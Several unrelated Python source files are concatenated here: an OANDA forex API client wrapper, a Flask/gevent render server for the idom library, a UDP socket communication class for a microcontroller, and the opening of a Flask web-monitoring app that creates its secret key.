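# or by running this module directly, which defers to the traitlets entry point:
if __name__ == '__main__':
    main()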
|
vnoanda.py
|
# encoding: utf-8
import traceback
import json
import requests
try:
    from queue import Queue, Empty  # Python 3
except ImportError:  # Python 2 fallback
    from Queue import Queue, Empty
from threading import Thread
API_SETTING = {}
API_SETTING['practice'] = {'rest': 'https://api-fxpractice.oanda.com',
'stream': 'https://stream-fxpractice.oanda.com'}
API_SETTING['trade'] = {'rest': 'https://api-fxtrade.oanda.com',
'stream': 'https://stream-fxtrade.oanda.com/'}
FUNCTIONCODE_GETINSTRUMENTS = 0
FUNCTIONCODE_GETPRICES = 1
FUNCTIONCODE_GETPRICEHISTORY = 2
FUNCTIONCODE_GETACCOUNTS = 3
FUNCTIONCODE_GETACCOUNTINFO = 4
FUNCTIONCODE_GETORDERS = 5
FUNCTIONCODE_SENDORDER = 6
FUNCTIONCODE_GETORDERINFO = 7
FUNCTIONCODE_MODIFYORDER = 8
FUNCTIONCODE_CANCELORDER = 9
FUNCTIONCODE_GETTRADES = 10
FUNCTIONCODE_GETTRADEINFO = 11
FUNCTIONCODE_MODIFYTRADE = 12
FUNCTIONCODE_CLOSETRADE = 13
FUNCTIONCODE_GETPOSITIONS = 14
FUNCTIONCODE_GETPOSITIONINFO = 15
FUNCTIONCODE_CLOSEPOSITION = 16
FUNCTIONCODE_GETTRANSACTIONS = 17
FUNCTIONCODE_GETTRANSACTIONINFO = 18
FUNCTIONCODE_GETACCOUNTHISTORY = 19
FUNCTIONCODE_GETCALENDAR = 20
FUNCTIONCODE_GETPOSITIONRATIOS = 21
FUNCTIONCODE_GETSPREADS = 22
FUNCTIONCODE_GETCOMMITMENTS = 23
FUNCTIONCODE_GETORDERBOOK = 24
FUNCTIONCODE_GETAUTOCHARTIST = 25
FUNCTIONCODE_STREAMPRICES = 26
FUNCTIONCODE_STREAMEVENTS = 27
########################################################################
class OandaApi(object):
""""""
DEBUG = False
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.token = ''
self.accountId = ''
self.headers = {}
self.restDomain = ''
self.streamDomain = ''
self.session = None
self.functionSetting = {}
        self.active = False    # whether the API worker threads are running
        self.reqID = 0    # request sequence number
        self.reqQueue = Queue()    # queue of pending REST requests
        self.reqThread = Thread(target=self.processQueue)    # request worker thread
        self.streamPricesThread = Thread(target=self.processStreamPrices)   # streaming prices thread
        self.streamEventsThread = Thread(target=self.processStreamEvents)   # streaming events thread (fills etc.)
#----------------------------------------------------------------------
def init(self, settingName, token, accountId):
"""初始化接口"""
self.restDomain = API_SETTING[settingName]['rest']
self.streamDomain = API_SETTING[settingName]['stream']
self.session = requests.Session()
self.token = token
self.accountId = accountId
self.headers['Authorization'] = 'Bearer ' + self.token
self.initFunctionSetting(FUNCTIONCODE_GETINSTRUMENTS, {'path': '/v1/instruments',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETPRICES, {'path': '/v1/prices',
'method': 'GET'})
        self.initFunctionSetting(FUNCTIONCODE_GETPRICEHISTORY, {'path': '/v1/candles',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETACCOUNTS, {'path': '/v1/accounts',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETACCOUNTINFO, {'path': '/v1/accounts/%s' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETORDERS, {'path': '/v1/accounts/%s/orders' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_SENDORDER, {'path': '/v1/accounts/%s/orders' %self.accountId,
'method': 'POST'})
self.initFunctionSetting(FUNCTIONCODE_GETORDERINFO, {'path': '/v1/accounts/%s/orders' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_MODIFYORDER, {'path': '/v1/accounts/%s/orders' %self.accountId,
'method': 'PATCH'})
self.initFunctionSetting(FUNCTIONCODE_CANCELORDER, {'path': '/v1/accounts/%s/orders' %self.accountId,
'method': 'DELETE'})
self.initFunctionSetting(FUNCTIONCODE_GETTRADES, {'path': '/v1/accounts/%s/trades' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETTRADEINFO, {'path': '/v1/accounts/%s/trades' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_MODIFYTRADE, {'path': '/v1/accounts/%s/trades' %self.accountId,
'method': 'PATCH'})
self.initFunctionSetting(FUNCTIONCODE_CLOSETRADE, {'path': '/v1/accounts/%s/trades' %self.accountId,
'method': 'DELETE'})
self.initFunctionSetting(FUNCTIONCODE_GETPOSITIONS, {'path': '/v1/accounts/%s/positions' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETPOSITIONINFO, {'path': '/v1/accounts/%s/positions' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_CLOSEPOSITION, {'path': '/v1/accounts/%s/positions' %self.accountId,
'method': 'DELETE'})
self.initFunctionSetting(FUNCTIONCODE_GETTRANSACTIONS, {'path': '/v1/accounts/%s/transactions' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETTRANSACTIONINFO, {'path': '/v1/accounts/%s/transactions' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETACCOUNTHISTORY, {'path': '/v1/accounts/%s/alltransactions' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETCALENDAR, {'path': '/labs/v1/calendar',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETPOSITIONRATIOS, {'path': '/labs/v1/historical_position_ratios',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETSPREADS, {'path': '/labs/v1/spreads',
'method': 'GET'})
        self.initFunctionSetting(FUNCTIONCODE_GETCOMMITMENTS, {'path': '/labs/v1/commitments',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETORDERBOOK, {'path': '/labs/v1/orderbook_data',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETAUTOCHARTIST, {'path': '/labs/v1/autochartist',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_STREAMPRICES, {'path': '/v1/prices',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_STREAMEVENTS, {'path': '/v1/events',
'method': 'GET'})
self.active = True
self.reqThread.start()
self.streamEventsThread.start()
self.streamPricesThread.start()
#----------------------------------------------------------------------
def exit(self):
"""退出接口"""
if self.active:
self.active = False
self.reqThread.join()
#----------------------------------------------------------------------
def initFunctionSetting(self, code, setting):
"""初始化API功能字典"""
self.functionSetting[code] = setting
#----------------------------------------------------------------------
def processRequest(self, req):
"""发送请求并通过回调函数推送数据结果"""
url = req['url']
method = req['method']
params = req['params']
stream = False
if 'stream' in req:
stream = req['stream']
if method in ['GET', 'DELETE']:
myreq = requests.Request(method, url, headers=self.headers, params=params)
elif method in ['POST', 'PATCH']:
myreq = requests.Request(method, url, headers=self.headers, data=params)
pre = myreq.prepare()
r = None
error = None
try:
r = self.session.send(pre, stream=stream)
except :
error = traceback.format_exc()
return r, error
#----------------------------------------------------------------------
def processQueue(self):
"""处理请求队列中的请求"""
while self.active:
try:
                req = self.reqQueue.get(block=True, timeout=1)  # block for at most one second waiting for a request
callback = req['callback']
reqID = req['reqID']
r, error = self.processRequest(req)
if r:
try:
data = r.json()
if self.DEBUG:
print(callback.__name__)
callback(data, reqID)
except :
self.onError(traceback.format_exc(), reqID)
else:
self.onError(error, reqID)
except Empty:
pass
#----------------------------------------------------------------------
def sendRequest(self, code, params, callback, optional=''):
"""发送请求"""
setting = self.functionSetting[code]
url = self.restDomain + setting['path']
if optional:
url = url + '/' + optional
self.reqID += 1
req = {'url': url,
'method': setting['method'],
'params': params,
'callback': callback,
'reqID': self.reqID}
self.reqQueue.put(req)
return self.reqID
#----------------------------------------------------------------------
def onError(self, error, reqID):
"""错误信息回调"""
print(error, reqID)
#----------------------------------------------------------------------
def getInstruments(self, params):
"""查询可交易的合约列表"""
return self.sendRequest(FUNCTIONCODE_GETINSTRUMENTS, params, self.onGetInstruments)
#----------------------------------------------------------------------
def onGetInstruments(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getPrices(self, params):
"""查询价格"""
return self.sendRequest(FUNCTIONCODE_GETPRICES, params, self.onGetPrices)
#----------------------------------------------------------------------
def onGetPrices(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
    def getPriceHistory(self, params):
"""查询历史价格数据"""
return self.sendRequest(FUNCTIONCODE_GETPRICEHISTORY, params, self.onGetPriceHistory)
#----------------------------------------------------------------------
def onGetPriceHistory(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getAccounts(self):
"""查询用户的所有账户"""
return self.sendRequest(FUNCTIONCODE_GETACCOUNTS, {}, self.onGetAccounts)
#----------------------------------------------------------------------
def onGetAccounts(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getAccountInfo(self):
"""查询账户数据"""
return self.sendRequest(FUNCTIONCODE_GETACCOUNTINFO, {}, self.onGetAccountInfo)
#----------------------------------------------------------------------
def onGetAccountInfo(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getOrders(self, params):
"""查询所有委托"""
return self.sendRequest(FUNCTIONCODE_GETORDERS, params, self.onGetOrders)
#----------------------------------------------------------------------
def onGetOrders(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def sendOrder(self, params):
"""发送委托"""
return self.sendRequest(FUNCTIONCODE_SENDORDER, params, self.onSendOrder)
#----------------------------------------------------------------------
def onSendOrder(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getOrderInfo(self, optional):
"""查询委托信息"""
return self.sendRequest(FUNCTIONCODE_GETORDERINFO, {}, self.onGetOrderInfo, optional)
#----------------------------------------------------------------------
def onGetOrderInfo(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def modifyOrder(self, params, optional):
"""修改委托"""
return self.sendRequest(FUNCTIONCODE_MODIFYORDER, params, self.onModifyOrder, optional)
#----------------------------------------------------------------------
def onModifyOrder(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def cancelOrder(self, optional):
"""查询委托信息"""
return self.sendRequest(FUNCTIONCODE_CANCELORDER, {}, self.onCancelOrder, optional)
#----------------------------------------------------------------------
def onCancelOrder(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getTrades(self, params):
"""查询所有仓位"""
return self.sendRequest(FUNCTIONCODE_GETTRADES, params, self.onGetTrades)
#----------------------------------------------------------------------
def onGetTrades(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getTradeInfo(self, optional):
"""查询仓位信息"""
return self.sendRequest(FUNCTIONCODE_GETTRADEINFO, {}, self.onGetTradeInfo, optional)
#----------------------------------------------------------------------
def onGetTradeInfo(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def modifyTrade(self, params, optional):
"""修改仓位"""
return self.sendRequest(FUNCTIONCODE_MODIFYTRADE, params, self.onModifyTrade, optional)
#----------------------------------------------------------------------
def onModifyTrade(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def closeTrade(self, optional):
"""平仓"""
return self.sendRequest(FUNCTIONCODE_CLOSETRADE, {}, self.onCloseTrade, optional)
#----------------------------------------------------------------------
def onCloseTrade(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getPositions(self):
"""查询所有汇总仓位"""
return self.sendRequest(FUNCTIONCODE_GETPOSITIONS, {}, self.onGetPositions)
#----------------------------------------------------------------------
def onGetPositions(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getPositionInfo(self, optional):
"""查询汇总仓位信息"""
return self.sendRequest(FUNCTIONCODE_GETPOSITIONINFO, {}, self.onGetPositionInfo, optional)
#----------------------------------------------------------------------
def onGetPositionInfo(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def closePosition(self, optional):
"""平仓汇总仓位信息"""
return self.sendRequest(FUNCTIONCODE_CLOSEPOSITION, {}, self.onClosePosition, optional)
#----------------------------------------------------------------------
def onClosePosition(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getTransactions(self, params):
"""查询所有资金变动"""
return self.sendRequest(FUNCTIONCODE_GETTRANSACTIONS, params, self.onGetTransactions)
#----------------------------------------------------------------------
def onGetTransactions(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getTransactionInfo(self, optional):
"""查询资金变动信息"""
return self.sendRequest(FUNCTIONCODE_GETTRANSACTIONINFO, {}, self.onGetTransactionInfo, optional)
#----------------------------------------------------------------------
def onGetTransactionInfo(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getAccountHistory(self):
"""查询账户资金变动历史"""
return self.sendRequest(FUNCTIONCODE_GETACCOUNTHISTORY, {}, self.onGetAccountHistory)
#----------------------------------------------------------------------
def onGetAccountHistory(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getCalendar(self, params):
"""查询日历"""
return self.sendRequest(FUNCTIONCODE_GETCALENDAR, params, self.onGetCalendar)
#----------------------------------------------------------------------
def onGetCalendar(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getPositionRatios(self, params):
"""查询持仓比例"""
return self.sendRequest(FUNCTIONCODE_GETPOSITIONRATIOS, params, self.onGetPositionRatios)
#----------------------------------------------------------------------
def onGetPositionRatios(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getSpreads(self, params):
"""查询所有仓位"""
return self.sendRequest(FUNCTIONCODE_GETSPREADS, params, self.onGetSpreads)
#----------------------------------------------------------------------
def onGetSpreads(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getCommitments(self, params):
"""查询交易商持仓情况"""
        return self.sendRequest(FUNCTIONCODE_GETCOMMITMENTS, params, self.onGetCommitments)
#----------------------------------------------------------------------
def onGetCommitments(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getOrderbook(self, params):
"""查询订单簿"""
return self.sendRequest(FUNCTIONCODE_GETORDERBOOK, params, self.onGetOrderbook)
#----------------------------------------------------------------------
def onGetOrderbook(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getAutochartist(self, params):
"""查询Autochartist识别的模式"""
return self.sendRequest(FUNCTIONCODE_GETAUTOCHARTIST, params, self.onGetAutochartist)
#----------------------------------------------------------------------
def onGetAutochartist(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def onPrice(self, data):
"""行情推送"""
print(data)
#----------------------------------------------------------------------
def onEvent(self, data):
"""事件推送(成交等)"""
print(data)
#----------------------------------------------------------------------
def processStreamPrices(self):
"""获取价格推送"""
        # first fetch the symbols of all instruments
setting = self.functionSetting[FUNCTIONCODE_GETINSTRUMENTS]
req = {'url': self.restDomain + setting['path'],
'method': setting['method'],
'params': {'accountId': self.accountId}}
r, error = self.processRequest(req)
if r:
try:
data = r.json()
symbols = [d['instrument'] for d in data['instruments']]
except :
self.onError(traceback.format_exc(), -1)
return
else:
self.onError(error, -1)
return
        # then subscribe to streaming prices for all instruments
setting = self.functionSetting[FUNCTIONCODE_STREAMPRICES]
params = {'accountId': self.accountId,
'instruments': ','.join(symbols)}
req = {'url': self.streamDomain + setting['path'],
'method': setting['method'],
'params': params,
'stream': True}
r, error = self.processRequest(req)
if r:
for line in r.iter_lines():
if line:
try:
msg = json.loads(line)
if self.DEBUG:
print(self.onPrice.__name__)
self.onPrice(msg)
except :
self.onError(traceback.format_exc(), -1)
if not self.active:
break
else:
self.onError(error, -1)
#----------------------------------------------------------------------
def processStreamEvents(self):
"""获取事件推送"""
setting = self.functionSetting[FUNCTIONCODE_STREAMEVENTS]
req = {'url': self.streamDomain + setting['path'],
'method': setting['method'],
'params': {},
'stream': True}
r, error = self.processRequest(req)
if r:
for line in r.iter_lines():
if line:
try:
msg = json.loads(line)
if self.DEBUG:
print(self.onEvent.__name__)
self.onEvent(msg)
except :
self.onError(traceback.format_exc(), -1)
if not self.active:
break
else:
self.onError(error, -1)
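# Usage sketch (assumption: the token and account id below are placeholders for
# practice-account credentials; responses arrive asynchronously through the
# onGet* callbacks, so a real program would override them):
#
# api = OandaApi()
# api.init('practice', 'your-token-here', 'your-account-id')
# api.getAccountInfo()
# ...
# api.exit()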
|
flask.py
|
import asyncio
import json
import logging
from asyncio import Queue as AsyncQueue
from queue import Queue as ThreadQueue
from threading import Event as ThreadEvent
from threading import Thread
from typing import Any, Callable, Dict, NamedTuple, Optional, Tuple, Type, Union, cast
from urllib.parse import parse_qs as parse_query_string
from flask import Blueprint, Flask, redirect, request, send_from_directory, url_for
from flask_cors import CORS
from flask_sockets import Sockets
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from geventwebsocket.websocket import WebSocket
from typing_extensions import TypedDict
import idom
from idom.client.manage import BUILD_DIR
from idom.core.dispatcher import AbstractDispatcher, SingleViewDispatcher
from idom.core.layout import Layout, LayoutEvent, LayoutUpdate
from .base import AbstractRenderServer
class Config(TypedDict, total=False):
"""Render server config for :class:`FlaskRenderServer`"""
import_name: str
url_prefix: str
cors: Union[bool, Dict[str, Any]]
serve_static_files: bool
redirect_root_to_index: bool
class FlaskRenderServer(AbstractRenderServer[Flask, Config]):
"""Base class for render servers which use Flask"""
_dispatcher_type: Type[AbstractDispatcher]
_wsgi_server: pywsgi.WSGIServer
def stop(self, timeout: Optional[float] = None) -> None:
try:
server = self._wsgi_server
except AttributeError: # pragma: no cover
raise RuntimeError(
f"Application is not running or was not started by {self}"
)
else:
server.stop(timeout)
def _create_config(self, config: Optional[Config]) -> Config:
new_config: Config = {
"import_name": __name__,
"url_prefix": "",
"cors": False,
"serve_static_files": True,
"redirect_root_to_index": True,
**(config or {}), # type: ignore
}
return new_config
def _default_application(self, config: Config) -> Flask:
return Flask(config["import_name"])
def _setup_application(self, config: Config, app: Flask) -> None:
bp = Blueprint("idom", __name__, url_prefix=config["url_prefix"])
self._setup_blueprint_routes(config, bp)
cors_config = config["cors"]
if cors_config: # pragma: no cover
cors_params = cors_config if isinstance(cors_config, dict) else {}
CORS(bp, **cors_params)
app.register_blueprint(bp)
sockets = Sockets(app)
@sockets.route(_join_url_paths(config["url_prefix"], "/stream")) # type: ignore
def model_stream(ws: WebSocket) -> None:
def send(value: Any) -> None:
ws.send(json.dumps(value))
def recv() -> Optional[LayoutEvent]:
event = ws.receive()
if event is not None:
return LayoutEvent(**json.loads(event))
else:
return None
query_params = {
k: v if len(v) > 1 else v[0]
for k, v in parse_query_string(ws.environ["QUERY_STRING"]).items()
}
run_dispatcher_in_thread(
lambda: self._dispatcher_type(
Layout(self._root_component_constructor(**query_params))
),
send,
recv,
None,
)
def _setup_blueprint_routes(self, config: Config, blueprint: Blueprint) -> None:
if config["serve_static_files"]:
@blueprint.route("/client/<path:path>")
def send_build_dir(path: str) -> Any:
return send_from_directory(str(BUILD_DIR), path)
if config["redirect_root_to_index"]:
@blueprint.route("/")
def redirect_to_index() -> Any:
return redirect(
url_for(
"idom.send_build_dir",
path="index.html",
**request.args,
)
)
def _setup_application_did_start_event(
self, config: Config, app: Flask, event: ThreadEvent
) -> None:
@app.before_first_request
def server_did_start() -> None:
event.set()
def _run_application(
self,
config: Config,
app: Flask,
host: str,
port: int,
args: Tuple[Any, ...],
kwargs: Dict[str, Any],
) -> None:
self._generic_run_application(app, host, port, *args, **kwargs)
def _run_application_in_thread(
self,
config: Config,
app: Flask,
host: str,
port: int,
args: Tuple[Any, ...],
kwargs: Dict[str, Any],
) -> None:
self._generic_run_application(app, host, port, *args, **kwargs)
def _generic_run_application(
self,
app: Flask,
host: str = "",
port: int = 5000,
debug: bool = False,
*args: Any,
**kwargs: Any,
) -> None:
if debug:
logging.basicConfig(level=logging.DEBUG) # pragma: no cover
logging.debug("Starting server...")
self._wsgi_server = _StartCallbackWSGIServer(
self._server_did_start.set,
(host, port),
app,
*args,
handler_class=WebSocketHandler,
**kwargs,
)
self._wsgi_server.serve_forever()
class PerClientStateServer(FlaskRenderServer):
"""Each client view will have its own state."""
_dispatcher_type = SingleViewDispatcher
def run_dispatcher_in_thread(
make_dispatcher: Callable[[], AbstractDispatcher],
send: Callable[[Any], None],
recv: Callable[[], Optional[LayoutEvent]],
context: Optional[Any],
) -> None:
dispatch_thread_info_created = ThreadEvent()
dispatch_thread_info_ref: idom.Ref[Optional[_DispatcherThreadInfo]] = idom.Ref(None)
def run_dispatcher() -> None:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
thread_send_queue: "ThreadQueue[LayoutUpdate]" = ThreadQueue()
async_recv_queue: "AsyncQueue[LayoutEvent]" = AsyncQueue()
async def send_coro(value: Any) -> None:
thread_send_queue.put(value)
async def recv_coro() -> Any:
return await async_recv_queue.get()
async def main() -> None:
async with make_dispatcher() as dispatcher:
await dispatcher.run(send_coro, recv_coro, context)
main_future = asyncio.ensure_future(main())
dispatch_thread_info_ref.current = _DispatcherThreadInfo(
dispatch_loop=loop,
dispatch_future=main_future,
thread_send_queue=thread_send_queue,
async_recv_queue=async_recv_queue,
)
dispatch_thread_info_created.set()
loop.run_until_complete(main_future)
Thread(target=run_dispatcher, daemon=True).start()
dispatch_thread_info_created.wait()
dispatch_thread_info = cast(_DispatcherThreadInfo, dispatch_thread_info_ref.current)
assert dispatch_thread_info is not None
stop = ThreadEvent()
def run_send() -> None:
while not stop.is_set():
send(dispatch_thread_info.thread_send_queue.get())
Thread(target=run_send, daemon=True).start()
try:
while True:
value = recv()
if value is None:
stop.set()
break
dispatch_thread_info.dispatch_loop.call_soon_threadsafe(
dispatch_thread_info.async_recv_queue.put_nowait, value
)
finally:
dispatch_thread_info.dispatch_loop.call_soon_threadsafe(
dispatch_thread_info.dispatch_future.cancel
)
return None
class _DispatcherThreadInfo(NamedTuple):
dispatch_loop: asyncio.AbstractEventLoop
dispatch_future: "asyncio.Future[Any]"
thread_send_queue: "ThreadQueue[LayoutUpdate]"
async_recv_queue: "AsyncQueue[LayoutEvent]"
class _StartCallbackWSGIServer(pywsgi.WSGIServer): # type: ignore
def __init__(
self, before_first_request: Callable[[], None], *args: Any, **kwargs: Any
) -> None:
self._before_first_request_callback = before_first_request
super().__init__(*args, **kwargs)
def update_environ(self) -> None:
"""
Called before the first request is handled to fill in WSGI environment values.
This includes getting the correct server name and port.
"""
super().update_environ()
# BUG: for some reason coverage doesn't seem to think this line is covered
self._before_first_request_callback() # pragma: no cover
def _join_url_paths(*args: str) -> str:
# urllib.parse.urljoin performs more logic than is needed. Thus we need a util func
# to join paths as if they were POSIX paths.
return "/".join(map(lambda x: str(x).rstrip("/"), filter(None, args)))
|
py_socket_api.py
|
# -*- coding: utf-8 -*-
"""
Class for handling Wifi operations - python 3.6
---------------------------------------
Author: Marcel Burda
Date: 17.07.2019
"""
import socket # udp services
import time # time functions like e.g. sleep
import threading # multi-threading and mutex
import struct # packing and unpacking byte objects in specified c types
import keyboard # quitting program
class WifiComm:
def __init__(self, target_address, port, printing=True):
"""
Initialise the UDP socket, bind it to the local host address and store the target settings.
:param target_address: (str) target IP address of MCU
:param port: (int) port number of the socket/communication (see https://bit.ly/1MYu7Qk)
:param printing: (bool) a flag for printing some information and received/sent data
"""
# set host address and port
self.host = socket.gethostbyname(socket.gethostname())
self.port = port
# create socket object with UDP services
self.udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# bind the socket object to host address and port
self.udp_sock.bind((self.host, self.port))
# set printing flag
self.printing = printing
if self.printing:
# print success
print("UDP Socket successfully created ( host: '" + self.host + "', port: " + str(self.port) + " )")
# set and print target address
self.target_address = target_address
if self.printing:
print("Target IP address is '" + target_address + "'")
# initialize thread objects
self.t1_receive = list()
self.t1_stop = False
self.t2_stop = False
# initialize mutex object (acquire: lock, release: unlock)
self.mutex = threading.Lock()
# buffer in which formatted received data is stored
self.buffer = [['------>']]
# set format string for unpacking raw received data (see documentation of pythons module struct!)
self.format_string = 'B' # this means all incoming bytes are interpreted as uint8
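# Note: __receive_thread repeats this format once per received byte
# (struct.unpack(self.format_string * len(raw_data), raw_data)), so only single-byte
# format codes such as 'B' or 'b' unpack cleanly without further changes.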
def __receive_thread(self):
"""
An internal method, called from 'run_receive_thread'.
The thread waits until data arrives, unpacks it into a readable list and then
appends that list to the buffer.
"""
while not self.t1_stop:
# receiving data
try:
self.udp_sock.settimeout(3.0) # recvfrom() blocks forever if nothing is received, so use a timeout
raw_data, raw_address = self.udp_sock.recvfrom(65535) # max UDP payload is 65507 bytes, so 64 KiB covers any datagram
except socket.error as msg:
if str(msg) == 'timed out':
pass
else:
print("WARNING: __receive_thread -> " + str(msg))
else:
# 'nice' print out
if self.printing:
print("DATA RECEIVED -> " + raw_data.hex() + " length: " + str(len(raw_data)) + " from: " + str(raw_address))
try:
recv_data = struct.unpack(self.format_string * len(raw_data), raw_data)
except struct.error as msg:
print("WARNING: __receive_thread -> " + str(msg) + " (Data: " + raw_data.hex() + ")")
else:
self.mutex.acquire() # enter critical section
self.buffer += [[recv_data]]
self.mutex.release() # leave critical section
def run_receive_thread(self):
"""
Start the receive loop.
"""
# only create the thread if it has not been started yet; starting it multiple times causes trouble
if isinstance(self.t1_receive, list):
# create thread object
self.t1_receive = threading.Thread(target=self.__receive_thread, args=[])
# start created thread
self.t1_receive.start()
if self.printing:
print('Started receive thread')
# noinspection PyMethodMayBeStatic
def __pack_tx_data(self, send_data, send_data_format):
"""
An internal method, called by 'send_message'.
Pack all the information with the corresponding types into a single byte object.
Byte object is needed by socket module to send.
:param send_data: (list of int) TX data
:param send_data_format: (str) format string to pack data, default: all uint8
:return: the resulting byte object
"""
# init byte object
all_data = bytes(0)
# for loop iterate over send_data list and pack the elements in all_data
for i in range(len(send_data)):
try:
all_data += struct.pack(send_data_format, send_data[i])
except struct.error as msg:
print("WARNING: __pack_tx_data -> " + str(msg))
return all_data
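# Packing sketch (illustrative): with the default format 'B', every int in send_data is
# packed as a single unsigned byte, e.g.
#   struct.pack('B', 255)                     -> b'\xff'
#   struct.pack('B', 1) + struct.pack('B', 2) -> b'\x01\x02'
# Values outside 0..255 raise struct.error, which is caught and reported above.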
def send_message(self, send_data, send_data_format='B'):
"""
Method for triggering a single send command.
:param send_data: (list of int) TX data
:param send_data_format: (str) format string to pack data, default: all uint8
"""
# store ID and Data in a byte object
msg = self.__pack_tx_data(send_data, send_data_format)
# send message if the length of the byte object is greater than 0 (= packing was successful)
if len(msg) > 0:
try:
self.udp_sock.sendto(msg, (self.target_address, self.port))
except socket.error as msg:
print("WARNING: send_message -> " + str(msg))
else:
# nice print out
if self.printing:
print(" DATA SENT -> " + str(send_data))
else:
print('WARNING: send_message -> message length is 0')
def __send_cyclic_thread(self, send_data, send_data_format, interval_time):
"""
An internal method, called by 'run_send_cyclic_thread'.
A simple send loop with a sleep in between; it exits once t2_stop is set to True.
:param send_data: (list of int) TX data
:param send_data_format: (str) format string to pack data, default: all uint8
:param interval_time: (float or int) pause between consecutive sends in seconds
"""
while not self.t2_stop:
self.send_message(send_data, send_data_format)
time.sleep(interval_time)
def run_send_cyclic_thread(self, send_data, send_data_format='B', interval_time=1):
"""
A method for triggering a cyclic send.
Starts a thread that calls 'send_message' every 'interval_time' seconds until t2_stop is set to True.
:param send_data: (list of int) TX data
:param send_data_format: (str) format string to pack data, default: all uint8
:param interval_time: (float or int) pause between consecutive sends in seconds
"""
t2 = threading.Thread(target=self.__send_cyclic_thread, args=[send_data, send_data_format, interval_time])
t2.start()
if __name__ == '__main__':
# prepare target ip address
target_ip = socket.gethostbyname(socket.gethostname()).split('.') # get own ip and split into list
target_ip[-1] = '255' # last value of list is 255 (broadcast for testing)
target_ip = '.'.join(target_ip) # put the ip back together again
# set port
socket_port = 1025
# create udp class obj
udp = WifiComm(target_ip, socket_port, printing=True)
# run receive thread
udp.run_receive_thread()
# send data in cyclic thread
s_data = [1, 2, 3, 4, 0xFF, 0b10101010]
udp.run_send_cyclic_thread(s_data)
# exit program condition (press ESC)
while True:
if keyboard.is_pressed('esc'):
udp.t1_stop = True
udp.t2_stop = True
break
time.sleep(0.1)
|
__init__.py
|
#!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import time
import os
import timeago
import flask_login
from flask_login import login_required
import threading
from threading import Event
import queue
from flask import Flask, render_template, request, send_from_directory, abort, redirect, url_for, flash
from feedgen.feed import FeedGenerator
from flask import make_response
import datetime
import pytz
from copy import deepcopy
__version__ = '0.39.5'
datastore = None
# Local
running_update_threads = []
ticker_thread = None
extra_stylesheets = []
update_q = queue.Queue()
notification_q = queue.Queue()
# Needs to be set this way because we also build and publish via pip
base_path = os.path.dirname(os.path.realpath(__file__))
app = Flask(__name__,
static_url_path="{}/static".format(base_path),
template_folder="{}/templates".format(base_path))
# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False
app.config['LOGIN_DISABLED'] = False
#app.config["EXPLAIN_TEMPLATE_LOADING"] = True
# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
def init_app_secret(datastore_path):
secret = ""
path = "{}/secret.txt".format(datastore_path)
try:
with open(path, "r") as f:
secret = f.read()
except FileNotFoundError:
import secrets
with open(path, "w") as f:
secret = secrets.token_hex(32)
f.write(secret)
return secret
